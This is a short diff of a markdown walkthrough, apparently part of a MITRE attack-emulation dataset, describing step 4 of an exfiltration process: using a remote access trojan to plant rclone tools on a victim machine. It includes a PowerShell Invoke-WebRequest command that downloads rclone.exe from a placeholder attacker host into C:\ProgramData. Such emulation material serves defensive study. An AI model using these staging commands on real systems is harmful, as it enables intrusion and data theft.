Abir-Ashab/Mitre-Dataset/exfiltration process.md

 ### 4. **Use RAT (PowerShell Shell) to Download Files on Victim**

 Go through **File Manager** to the expected folder and upload the **reclone.conf**, as it is small in size that's why we can upload it directly via RAT.
 But as the **rclone.exe** is big in size, thats why we need to send it via power shall.
-From attacker, send PowerShell commands via RAT.
+From the attacker, send PowerShell commands via RAT.
 You can do the same for the **rclone.conf** also.

 ```powershell
 Invoke-WebRequest -Uri "http://<attacker-ip>:8000/rclone.exe" -OutFile "C:\ProgramData\rclone.exe"